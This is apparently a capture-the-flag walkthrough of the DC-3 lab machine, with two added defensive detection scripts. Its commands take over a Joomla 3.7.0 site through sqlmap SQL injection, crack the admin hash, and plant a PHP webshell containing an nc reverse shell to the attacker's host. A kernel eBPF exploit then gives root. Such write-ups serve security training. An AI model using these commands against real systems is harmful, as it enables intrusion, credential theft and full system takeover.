I. Identify the target
Objective: there is only one flag, one entry point and no clues at all.
II. Information gathering
1. Host discovery
Scan the network to find the target host's IP address (arp-scan is faster than nmap for this).
arp-scan -l |grep 192.168.11
┌──(root㉿kali)-[~]
└─# arp-scan -l |grep 192.168.11
Interface: eth0, type: EN10MB, MAC: 00:0c:29:51:7e:3f, IPv4: 192.168.11.128
192.168.11.1 00:50:56:c0:00:08 VMware, Inc.
192.168.11.1 00:50:56:fe:d0:93 VMware, Inc. (DUP: 2)
192.168.11.140 00:0c:29:7f:c1:a7 VMware, Inc.
192.168.11.254 00:50:56:e2:e7:c6 VMware, Inc.
Target IP: 192.168.11.140
2. Port scanning
Use nmap to scan all ports.
nmap -A -Pn -p0-65535 192.168.11.140
┌──(root㉿kali)-[~]
└─# nmap -A -Pn -p0-65535 192.168.11.140
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-16 08:32 CST
Nmap scan report for 192.168.11.140
Host is up (0.00082s latency).
Not shown: 65535 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:7F:C1:A7 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.82 ms 192.168.11.140
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.39 seconds
3. Service discovery
The target only exposes a web service on port 80, running the Joomla CMS.
4. Web path brute-forcing
dirsearch -u 192.168.11.140 -e '*' -x 403
Note: quote the * so the shell does not expand it against files in the current directory; the "Extensions: admin" line in the output below shows that the unquoted glob had matched a file named admin.
┌──(root㉿kali)-[~]
└─# dirsearch -u 192.168.11.140 -e * -x 403
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: admin | HTTP method: GET | Threads: 30 | Wordlist size: 9006
Output File: /root/.dirsearch/reports/192.168.11.140_23-03-16_09-43-26.txt
Error Log: /root/.dirsearch/logs/errors-23-03-16_09-43-26.log
Target: http://192.168.11.140/
[09:43:26] Starting:
[09:43:28] 200 - 18KB - /LICENSE.txt
[09:43:29] 200 - 4KB - /README.txt
[09:43:31] 301 - 324B - /administrator -> http://192.168.11.140/administrator/
[09:43:31] 200 - 2KB - /administrator/includes/
[09:43:31] 200 - 31B - /administrator/cache/
[09:43:31] 200 - 5KB - /administrator/
[09:43:31] 301 - 329B - /administrator/logs -> http://192.168.11.140/administrator/logs/
[09:43:31] 200 - 31B - /administrator/logs/
[09:43:32] 301 - 314B - /bin -> http://192.168.11.140/bin/
[09:43:32] 200 - 31B - /bin/
[09:43:32] 301 - 316B - /cache -> http://192.168.11.140/cache/
[09:43:32] 200 - 31B - /cache/
[09:43:32] 200 - 31B - /cli/
[09:43:32] 301 - 321B - /components -> http://192.168.11.140/components/
[09:43:32] 200 - 31B - /components/
[09:43:33] 200 - 0B - /configuration.php
[09:43:35] 200 - 3KB - /htaccess.txt
[09:43:35] 301 - 317B - /images -> http://192.168.11.140/images/
[09:43:35] 200 - 31B - /images/
[09:43:35] 200 - 31B - /includes/
[09:43:35] 301 - 319B - /includes -> http://192.168.11.140/includes/
[09:43:35] 200 - 7KB - /index.php
[09:43:36] 301 - 319B - /language -> http://192.168.11.140/language/
[09:43:36] 200 - 31B - /layouts/
[09:43:36] 301 - 320B - /libraries -> http://192.168.11.140/libraries/
[09:43:36] 200 - 31B - /libraries/
[09:43:36] 301 - 316B - /media -> http://192.168.11.140/media/
[09:43:36] 200 - 31B - /media/
[09:43:37] 301 - 318B - /modules -> http://192.168.11.140/modules/
[09:43:37] 200 - 31B - /modules/
[09:43:38] 301 - 318B - /plugins -> http://192.168.11.140/plugins/
[09:43:38] 200 - 31B - /plugins/
[09:43:39] 200 - 836B - /robots.txt.dist
[09:43:41] 200 - 31B - /templates/
[09:43:41] 200 - 0B - /templates/system/
[09:43:41] 200 - 31B - /templates/index.html
[09:43:41] 200 - 0B - /templates/beez3/
[09:43:41] 301 - 320B - /templates -> http://192.168.11.140/templates/
[09:43:41] 200 - 0B - /templates/protostar/
[09:43:41] 301 - 314B - /tmp -> http://192.168.11.140/tmp/
[09:43:41] 200 - 31B - /tmp/
[09:43:42] 200 - 2KB - /web.config.txt
Task Completed
Reading /robots.txt.dist reveals the backend login page at http://192.168.11.140/administrator/.
/templates/beez3/ and /templates/protostar/ are presumably template directories.
5. Web reconnaissance
The home page states that the box has only one flag and that getting it requires root privileges.
6. Vulnerability discovery
Scan with joomscan, the Joomla-specific scanner.
joomscan -u http://192.168.11.140/
____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)
--=[OWASP JoomScan
+---++---==[Version : 0.0.7
+---++---==[Update Date : [2018/09/23]
+---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP
Processing http://192.168.11.140/ ...
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 3.7.0
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.11.140/administrator/components
http://192.168.11.140/administrator/modules
http://192.168.11.140/administrator/templates
http://192.168.11.140/images/banners
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page : http://192.168.11.140/administrator/
[+] Checking robots.txt existing
[++] robots.txt is not found
[+] Finding common backup files name
[++] Backup files are not found
[+] Finding common log files name
[++] error log is not found
[+] Checking sensitive config.php.x file
[++] Readable config files are not found
Your Report : reports/192.168.11.140/
This shows the basic Joomla information:
- Exact version: Joomla 3.7.0
Use searchsploit to check whether a usable exploit exists.
searchsploit Joomla 3.7.0
┌──(root㉿kali)-[~]
└─# searchsploit Joomla 3.7.0
------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------- ---------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection | php/webapps/42033.txt
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting | php/webapps/43488.txt
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
There is one SQL injection vulnerability and one XSS vulnerability; the SQL injection is clearly the more promising route to obtaining the administrator credentials and logging into the backend.
III. Vulnerability analysis
Locate and open the file php/webapps/42033.txt.
locate php/webapps/42033.txt
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
┌──(root㉿kali)-[~]
└─# locate php/webapps/42033.txt
/usr/share/exploitdb/exploits/php/webapps/42033.txt
┌──(root㉿kali)-[~]
└─# cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917
URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
Using Sqlmap:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
Parameter: list[fullordering] (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (DUAL)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)
The advisory gives the exact sqlmap command to run against the database.
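From the defender's side, the payload shapes in the advisory make this injection easy to spot in web server logs: a request to option=com_fields whose list[fullordering] value is anything other than a column name followed by ASC or DESC. The script below is an added example written for this writeup, not part of the original post or of EDB 42033. It parses Apache combined-format access log lines (the sample lines are constructed, and the IPs in them are placeholders, not the page's hosts) and flags requests matching the CVE-2017-8917 pattern; the legitimate ordering form "a.ordering ASC" is assumed from Joomla's list views.

```python
"""Flag requests matching the CVE-2017-8917 (Joomla 3.7.0 com_fields) injection
pattern in Apache combined-format access logs. Added example for this writeup."""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines; IPs are placeholders, not the page's hosts.
SAMPLE_LOG = r'''
10.0.0.5 - - [16/Mar/2023:09:50:01 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml%27 HTTP/1.1" 500 1234 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.5 - - [16/Mar/2023:09:50:02 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=%28SELECT+%2A+FROM+%28SELECT%28SLEEP%285%29%29%29GDiu%29 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [16/Mar/2023:09:51:10 +0800] "GET /index.php?option=com_content&view=article&id=2 HTTP/1.1" 200 7340 "-" "Mozilla/5.0"
10.0.0.7 - - [16/Mar/2023:09:51:11 +0800] "GET /administrator/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.ordering+ASC HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
'''

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Assumed legitimate form of a Joomla ordering value: "<column> ASC|DESC".
BENIGN_ORDERING = re.compile(r'^[A-Za-z_][A-Za-z0-9_.]*(\s+(ASC|DESC))?$', re.IGNORECASE)

# Tokens present in the error-, boolean- and time-based payloads shown in EDB 42033.
SQLI_TOKENS = re.compile(
    r'(updatexml|extractvalue|sleep\s*\(|case\s+when|floor\s*\(\s*rand|union\s+select|select\b)',
    re.IGNORECASE)


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def inspect_request(entry):
    """Return a finding for a com_fields request whose list[fullordering] value
    carries SQL tokens or falls outside the allowlisted form, else None."""
    qs = parse_qs(urlsplit(entry['target']).query, keep_blank_values=True)
    if qs.get('option', [''])[0] != 'com_fields':
        return None
    values = qs.get('list[fullordering]')  # parse_qs has already URL-decoded the key
    if not values:
        return None
    value = values[0]
    tok = SQLI_TOKENS.search(value)
    if tok:
        reason = f"sql token {tok.group(0)!r}"
    elif not BENIGN_ORDERING.match(value):
        reason = 'ordering value outside allowlist'
    else:
        return None
    return {'ip': entry['ip'], 'ts': entry['ts'], 'status': entry['status'],
            'value': value, 'reason': reason}


def scan_log(text):
    """Run inspect_request over every parseable line and collect the findings."""
    findings = []
    for line in text.strip().splitlines():
        entry = parse_line(line)
        if entry:
            finding = inspect_request(entry)
            if finding:
                findings.append(finding)
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} {f['reason']}: {f['value']}")
```

Because --random-agent rotates sqlmap's User-Agent, the check keys on the parameter value rather than on the agent string. A 500 response to such a request, as in the first sample line, is an extra signal for the error-based variant.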
IV. Exploitation
1. SQL injection
1.1 Enumerate databases
sqlmap -u "http://192.168.11.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys
The joomladb database is found.
1.2 Enumerate tables
sqlmap -u "http://192.168.11.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]
Database: joomladb
[76 tables]
+---------------------+
| #__assets |
| #__associations |
| #__banner_clients |
| #__banner_tracks |
| #__banners |
| #__bsms_admin |
| #__bsms_books |
| #__bsms_comments |
| #__bsms_locations |
| #__bsms_mediafiles |
| #__bsms_message_typ |
| #__bsms_podcast |
| #__bsms_series |
| #__bsms_servers |
| #__bsms_studies |
| #__bsms_studytopics |
| #__bsms_teachers |
| #__bsms_templatecod |
| #__bsms_templates |
| #__bsms_timeset |
| #__bsms_topics |
| #__bsms_update |
| #__categories |
| #__contact_details |
| #__content_frontpag |
| #__content_rating |
| #__content_types |
| #__content |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions |
| #__fields_categorie |
| #__fields_groups |
| #__fields_values |
| #__fields |
| #__finder_filters |
| #__finder_links_ter |
| #__finder_links |
| #__finder_taxonomy_ |
| #__finder_taxonomy |
| #__finder_terms_com |
| #__finder_terms |
| #__finder_tokens_ag |
| #__finder_tokens |
| #__finder_types |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages |
| #__menu_types |
| #__menu |
| #__messages_cfg |
| #__messages |
| #__modules_menu |
| #__modules |
| #__newsfeeds |
| #__overrider |
| #__postinstall_mess |
| #__redirect_links |
| #__schemas |
| #__session |
| #__tags |
| #__template_styles |
| #__ucm_base |
| #__ucm_content |
| #__ucm_history |
| #__update_sites_ext |
| #__update_sites |
| #__updates |
| #__user_keys |
| #__user_notes |
| #__user_profiles |
| #__user_usergroup_m |
| #__usergroups |
| #__users |
| #__utf8_conversion |
| #__viewlevels |
+---------------------+
The #__users table is found.
1.3 Enumerate columns
Note:
- When sqlmap asks whether to use the common column existence check, answer y manually; pressing Enter all the way through recovers no columns.
- Press Enter to accept the default wordlist /usr/share/sqlmap/data/txt/common-columns.txt.
sqlmap -u "http://192.168.11.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]
Database: joomladb
Table: #__users
[6 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| email | non-numeric |
| id | numeric |
| name | non-numeric |
| params | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+
The columns id, name, password and username are found.
1.4 Dump the column contents
sqlmap -u "http://192.168.11.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "id,name,password,username" --dump -p list[fullordering]
Database: joomladb
Table: #__users
[1 entry]
+-----+-------+--------------------------------------------------------------+----------+
| id | name | password | username |
+-----+-------+--------------------------------------------------------------+----------+
| 629 | admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu | admin |
+-----+-------+--------------------------------------------------------------+----------+
The password is stored as a hash.
2. Hash cracking
2.1 Save the hash
Save the hash to a file named admin.
vi admin
┌──(root㉿kali)-[~]
└─# vi admin
┌──(root㉿kali)-[~]
└─# cat admin
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
2.2 Crack with john
Note: the hash had already been cracked once here, so the -show option is used to display the result.
john admin
john -show admin
┌──(root㉿kali)-[~]
└─# john admin
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
No password hashes left to crack (see FAQ)
┌──(root㉿kali)-[~]
└─# john -show admin
?:snoopy
1 password hash cracked, 0 left
Cracked result: snoopy
Username: admin
Password: snoopy
2.3 Log in to the backend
Logging in with these credentials to the admin backend at http://192.168.11.140/administrator/ succeeds.
3. File upload vulnerability
3.1 Upload the file
Once in the backend, upload a webshell by editing a template.
Extensions --> Templates --> Templates
Any template will do; here the Beez3 template is edited.
In the html directory, create a webshell named shell.php (create, then save) with the following content:
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.11.128 6666 >/tmp/f");?>
3.2 Reverse shell
To trigger the webshell we need its path. The earlier web path brute-force exposed the template directories, and since the beez3 template was used the path should be:
That page is blank; combining it with the exposed template path, try http://192.168.11.140/templates/beez3/html
The uploaded shell.php is listed there. Start a listener on Kali:
nc -lvnp 6666
┌──(root㉿kali)-[~]
└─# nc -lvnp 6666
listening on [any] 6666 ...
Browse to shell.php:
After the request the connection comes back and we have a shell.
┌──(root㉿kali)-[~]
└─# nc -lvnp 6666
listening on [any] 6666 ...
connect to [192.168.11.128] from (UNKNOWN) [192.168.11.140] 37608
/bin/sh: 0: can't access tty; job control turned off
$
V. Privilege escalation
We cannot enter root's home directory, so the next step is to find a way to escalate privileges.
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
/var/www/html/templates/beez3/html
$ cd /root
/bin/sh: 6: cd: can't cd to /root
1. Obtain the exploit
About the lsb_release command:
LSB stands for Linux Standard Base; lsb_release prints the LSB information specific to the running Linux distribution.
Note: LSB is variously rendered in Chinese as "Linux standard library" or "Linux standard specification". A minimal CentOS install does not include this command by default; install the lsb_release package to use it.
1.1 Check the kernel version
uname -a
lsb_release -a
$ uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial
1.2 Search for kernel vulnerabilities
Search for kernel vulnerabilities affecting Ubuntu 16.04 LTS on kernel 4.4.0-21-generic.
searchsploit 4.4. Ubuntu 16.04
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalatio | linux/local/39772.txt
1.3 Locate and view the file
locate linux/local/39772.txt
vi /usr/share/exploitdb/exploits/linux/local/39772.txt
┌──(root㉿kali)-[~]
└─# locate linux/local/39772.txt
/usr/share/exploitdb/exploits/linux/local/39772.txt
┌──(root㉿kali)-[~]
└─# vi /usr/share/exploitdb/exploits/linux/local/39772.txt
1.4 Download the exploit
The download link for the exploit is on the last line of the file.
wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
┌──(root㉿kali)-[~]
└─# wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
--2023-03-16 18:27:08-- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
正在解析主机 gitlab.com (gitlab.com)... 172.65.251.78, 2606:4700:90:0:f22e:fbec:5bed:a9b9
正在连接 gitlab.com (gitlab.com)|172.65.251.78|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:7025 (6.9K) [application/octet-stream]
正在保存至: “39772.zip”
39772.zip 100%[=====================================================>] 6.86K --.-KB/s 用时 0.005s
2023-03-16 18:27:11 (1.33 MB/s) - 已保存 “39772.zip” [7025/7025])
2. Transfer the exploit to the target
Start an HTTP server on Kali.
python -m http.server 8888
┌──(root㉿kali)-[~]
└─# python -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
On the target, download 39772.zip into the /tmp directory.
cd /tmp
wget 192.168.11.128:8888/39772.zip
$ cd /tmp
$ pwd
/tmp
$ wget http://192.168.11.128:8888/39772.zip
--2023-03-16 20:29:14-- http://192.168.11.128:8888/39772.zip
Connecting to 192.168.11.128:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/zip]
Saving to: '39772.zip'
0K ...... 100% 1.92G=0s
2023-03-16 20:29:14 (1.92 GB/s) - '39772.zip' saved [7025/7025]
$ ls -l
total 16
-rw-r--r-- 1 www-data www-data 7025 Mar 16 20:27 39772.zip
prw-r--r-- 1 www-data www-data 0 Mar 16 20:29 f
drwx------ 3 root root 4096 Mar 15 19:16 systemd-private-eebb69eeaac946d088ae7471b81b6ac6-systemd-timesyncd.service-oySBFs
drwx------ 2 root root 4096 Mar 15 19:16 vmware-root
3. Local privilege escalation
Next, unpack, compile and run the exploit to obtain root privileges.
3.1 Unpack the exploit
After unzipping 39772.zip, enter the 39772 directory and extract exploit.tar to obtain the ebpf_mapfd_doubleput_exploit directory.
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
$ ls -l
total 16
-rw-r--r-- 1 www-data www-data 7025 Mar 16 20:27 39772.zip
prw-r--r-- 1 www-data www-data 0 Mar 17 10:22 f
drwx------ 3 root root 4096 Mar 17 2023 systemd-private-69003323551d4c3aaddd256cfdcdc1a4-systemd-timesyncd.service-qyTaDk
drwx------ 2 root root 4096 Mar 17 2023 vmware-root
$ unzip 39772.zip
Archive: 39772.zip
creating: 39772/
inflating: 39772/.DS_Store
creating: __MACOSX/
creating: __MACOSX/39772/
inflating: __MACOSX/39772/._.DS_Store
inflating: 39772/crasher.tar
inflating: __MACOSX/39772/._crasher.tar
inflating: 39772/exploit.tar
inflating: __MACOSX/39772/._exploit.tar
$ ls -l
total 24
drwxr-xr-x 2 www-data www-data 4096 Aug 16 2016 39772
-rw-r--r-- 1 www-data www-data 7025 Mar 16 20:27 39772.zip
drwxrwxr-x 3 www-data www-data 4096 Aug 16 2016 __MACOSX
prw-r--r-- 1 www-data www-data 0 Mar 17 10:23 f
drwx------ 3 root root 4096 Mar 17 2023 systemd-private-69003323551d4c3aaddd256cfdcdc1a4-systemd-timesyncd.service-qyTaDk
drwx------ 2 root root 4096 Mar 17 2023 vmware-root
$ cd 39772
$ ls -l
total 32
-rw-r--r-- 1 www-data www-data 10240 Aug 16 2016 crasher.tar
-rw-r--r-- 1 www-data www-data 20480 Aug 16 2016 exploit.tar
$ tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
$ ls -l
total 36
-rw-r--r-- 1 www-data www-data 10240 Aug 16 2016 crasher.tar
drwxr-x--- 2 www-data www-data 4096 Apr 26 2016 ebpf_mapfd_doubleput_exploit
-rw-r--r-- 1 www-data www-data 20480 Aug 16 2016 exploit.tar
3.2 Run the exploit
- Inspecting the exploit shows it lacks execute permission, so grant it first.
- Enter the ebpf_mapfd_doubleput_exploit directory.
- Run compile.sh to build it.
- Run the compiled doubleput binary.
- The message "we have root privs now..." indicates that root privileges have been obtained.
ls -Rl ebpf_mapfd_doubleput_exploit
chmod -R 777 ebpf_mapfd_doubleput_exploit
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput
$ ls -Rl ebpf_mapfd_doubleput_exploit
ebpf_mapfd_doubleput_exploit:
total 20
-rwxr-x--- 1 www-data www-data 155 Apr 26 2016 compile.sh
-rw-r----- 1 www-data www-data 4188 Apr 26 2016 doubleput.c
-rw-r----- 1 www-data www-data 2186 Apr 26 2016 hello.c
-rw-r----- 1 www-data www-data 255 Apr 26 2016 suidhelper.c
$ chmod -R 777 ebpf_mapfd_doubleput_exploit
$ cd ebpf_mapfd_doubleput_exploit
$ ./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
$ ls -l
total 52
-rwxrwxrwx 1 www-data www-data 155 Apr 26 2016 compile.sh
-rwxr-xr-x 1 www-data www-data 12336 Mar 17 10:36 doubleput
-rwxrwxrwx 1 www-data www-data 4188 Apr 26 2016 doubleput.c
-rwxr-xr-x 1 www-data www-data 8028 Mar 17 10:36 hello
-rwxrwxrwx 1 www-data www-data 2186 Apr 26 2016 hello.c
-rwxr-xr-x 1 www-data www-data 7524 Mar 17 10:36 suidhelper
-rwxrwxrwx 1 www-data www-data 255 Apr 26 2016 suidhelper.c
$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
whoami
root
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
Privilege escalation succeeded.
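Two host-side checks matter for the escalation path used here: whether unprivileged processes may call bpf() at all, which the kernel.unprivileged_bpf_disabled sysctl (present since kernel 4.4) controls, and whether a set-uid file has appeared in a scratch directory, which is the artefact the exploit's own "suid file detected" message reports just before it spawns the root shell. The script below is an added example for this writeup, not part of the original post or of EDB 39772; it reads the sysctl from a path you pass in and scans a directory for set-uid files, using a constructed temporary tree for the demonstration.

```python
"""Host checks for the eBPF double-fdput escalation path: is unprivileged bpf()
enabled, and has a set-uid file appeared in a scratch directory? Added example."""
import os
import stat
import tempfile
import pathlib

BPF_SYSCTL = '/proc/sys/kernel/unprivileged_bpf_disabled'  # present on kernels >= 4.4


def unprivileged_bpf_status(sysctl_path=BPF_SYSCTL):
    """Map the sysctl value to a verdict: '0' means unprivileged bpf() is allowed
    (the precondition the exploit needs); '1' or '2' mean disabled. None if unreadable."""
    try:
        value = pathlib.Path(sysctl_path).read_text().strip()
    except OSError:
        return None
    return {'0': 'allowed', '1': 'disabled', '2': 'disabled'}.get(value, 'unknown')


def find_setuid_files(root):
    """Return sorted relative paths of regular files under root with the set-uid bit."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(os.path.relpath(full, root))
    return sorted(hits)


def build_demo():
    """Constructed sample: a fake sysctl file reading '0' and a scratch directory
    holding one plain source file and one set-uid file."""
    base = tempfile.mkdtemp(prefix='bpf_demo_')
    sysctl = pathlib.Path(base, 'unprivileged_bpf_disabled')
    sysctl.write_text('0\n')
    scratch = pathlib.Path(base, 'tmp')
    (scratch / 'exploit').mkdir(parents=True)
    (scratch / 'exploit' / 'doubleput.c').write_text('/* placeholder source */')
    helper = scratch / 'suidhelper'
    helper.write_bytes(b'\x7fELF')  # placeholder bytes, not a real binary
    os.chmod(helper, 0o4755)        # set-uid bit, the artefact we want to catch
    return str(sysctl), str(scratch)


def report(sysctl_path, scratch_dir):
    """Combine both checks into one dict for an inventory or alerting job."""
    return {'unprivileged_bpf': unprivileged_bpf_status(sysctl_path),
            'setuid_files': find_setuid_files(scratch_dir)}


if __name__ == '__main__':
    demo_sysctl, demo_scratch = build_demo()
    print('demo:', report(demo_sysctl, demo_scratch))
    print('this host:', report(BPF_SYSCTL, '/tmp'))
```

On the DC-3 kernel the first check would report "allowed"; setting kernel.unprivileged_bpf_disabled=1 closes the bpf(BPF_PROG_LOAD) entry point for unprivileged users even before patching, and the second check turns the exploit's own "suid file detected" step into a detection opportunity.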
VI. Post-exploitation (finding the flag)
The flag is found in root's home directory.
cd /root
cat the-flag.txt
cd /root
ls -l
total 4
-rw-r--r-- 1 root root 604 Mar 26 2019 the-flag.txt
cat the-flag.txt
__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
Congratulations are in order. :-)
I hope you've enjoyed this challenge as I enjoyed making it.
If there are any ways that I can improve these little challenges,
please let me know.
As per usual, comments and complaints can be sent via Twitter to @DCAU7
Have a great day!!!!
With that the box is done, game over OVO